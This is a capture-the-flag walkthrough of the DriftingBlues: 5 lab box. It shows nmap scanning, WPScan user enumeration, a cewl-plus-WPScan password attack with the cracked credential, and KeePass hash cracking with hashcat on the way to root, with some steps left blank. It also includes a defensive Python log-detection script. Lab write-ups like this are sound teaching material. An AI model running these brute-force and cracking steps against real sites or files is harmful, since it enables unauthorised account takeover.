Box info:
Name: DriftingBlues: 5
OS: Linux
Rated Difficulty: 🟩🟩(easy)
====================================================================
Using nmap we find 2 open ports:
$ sudo nmap -sC -sV 192.168.0.10
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-03 09:56 EEST
Nmap scan report for 192.168.0.10
Host is up (0.00036s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
|   256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_  256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 5.6.2
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: diary – Just another WordPress site
MAC Address: 08:00:27:51:13:12 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Immediately we can see this is a WordPress website. Let's use WPScan to find the users:
$ wpscan --url http://192.168.0.10/ --enumerate u
[i] User(s) Identified:

[+] abuzerkomurcu
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.0.10/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] satanic
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] gill
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] collins
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] gadd
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
Save the five usernames to a file called users, then build a wordlist from the site's own content with cewl and feed both files to WPScan's password attack:
$ cewl -d 2 -m 4 -w passwd --with-numbers http://192.168.0.10/index.php
$ wpscan --url http://192.168.0.10/ --usernames users --passwords passwd
[!] Valid Combinations Found:
 | Username: gill, Password: interchangeable
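The enumeration and password attack above leave a distinctive trail in the web server's access log: sequential /?author=N probes, a hit on the wp-json users endpoint, and a burst of POSTs to wp-login.php. The following Python script, added here as a detection example and not part of the original writeup, scores those indicators per source IP over a few constructed Apache "combined" log lines; the log lines and the login-attempt threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed Apache access-log lines (an assumption, not the box's real log). They
# mimic the server-side view of WPScan's author-ID enumeration, the wp-json users
# lookup, and a wordlist attack against wp-login.php, plus one ordinary visitor.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Apr/2021:09:58:01 +0300] "GET /?author=1 HTTP/1.1" 301 0 "-" "WPScan v3.8.14"
10.0.0.5 - - [03/Apr/2021:09:58:01 +0300] "GET /?author=2 HTTP/1.1" 301 0 "-" "WPScan v3.8.14"
10.0.0.5 - - [03/Apr/2021:09:58:02 +0300] "GET /index.php/wp-json/wp/v2/users/?per_page=100&page=1 HTTP/1.1" 200 812 "-" "WPScan v3.8.14"
10.0.0.5 - - [03/Apr/2021:10:01:10 +0300] "POST /wp-login.php HTTP/1.1" 200 4210 "-" "WPScan v3.8.14"
10.0.0.5 - - [03/Apr/2021:10:01:10 +0300] "POST /wp-login.php HTTP/1.1" 200 4210 "-" "WPScan v3.8.14"
10.0.0.5 - - [03/Apr/2021:10:01:11 +0300] "POST /wp-login.php HTTP/1.1" 302 0 "-" "WPScan v3.8.14"
10.0.0.9 - - [03/Apr/2021:10:02:00 +0300] "GET /index.php/2021/04/01/hello/ HTTP/1.1" 200 9020 "-" "Mozilla/5.0"
"""
# Apache "combined" format: client, ident, user, [time], "request", status, bytes, "referer", "ua"
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
                     r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*"$')

def wp_indicators(log_text):
    """Per source IP, count the WordPress enumeration and login-attack indicators."""
    stats = defaultdict(lambda: {"author_probes": 0, "rest_users": 0, "login_posts": 0, "login_redirects": 0})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not in combined log format; skip
        s, path = stats[m["ip"]], m["path"]
        if m["method"] == "GET" and re.search(r"[?&]author=\d+", path):
            s["author_probes"] += 1       # /?author=N redirects to /author/<login>/ and leaks the name
        if "/wp-json/wp/v2/users" in path:
            s["rest_users"] += 1          # REST endpoint that lists authors outright
        if m["method"] == "POST" and path.startswith("/wp-login.php"):
            s["login_posts"] += 1
            if m["status"] == "302":      # a failed login re-renders the form with 200;
                s["login_redirects"] += 1 # a 302 to wp-admin means the password worked
    return dict(stats)

def flag_sources(log_text, login_threshold=3):
    """Return {ip: [reasons]} for sources matching the enumerate-then-brute-force pattern."""
    flagged = {}
    for ip, s in wp_indicators(log_text).items():
        reasons = []
        if s["author_probes"] >= 2 or s["rest_users"]:
            reasons.append("user enumeration")
        if s["login_posts"] >= login_threshold:
            reasons.append("login brute force" + (" (succeeded)" if s["login_redirects"] else ""))
        if reasons:
            flagged[ip] = reasons
    return flagged
```

The User-Agent is deliberately ignored because it is trivially changed; the request pattern and the 200-then-302 sequence on wp-login.php are what hold up, and on a real site the threshold should be tuned to normal login volume.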
Logging in as gill shows the account doesn't have administrator privileges, so we can't do much from the dashboard. Inside the Media tab, however, there is an image that isn't used in any of the posts.
Shell as user gill:
Inside gill's home directory there is a file with the .kdbx extension (a KeePass database).
Send the file to your machine and use John the Ripper's keepass2john utility to extract a hash from it, so you can crack it with hashcat:
keepass2john keyfile.kdbx > hash
Now run hashcat against that hash (I used hashcat on Windows):
.\hashcat64.exe -m 13400 .\hash .\rockyou.txt
The password from hashcat:
Open KeePass2 (you can install it with apt), open the database and enter the master password you just cracked:
Shell as root:
Now read the rootcreds.txt entry stored in the database and use the password inside it to get a shell as root.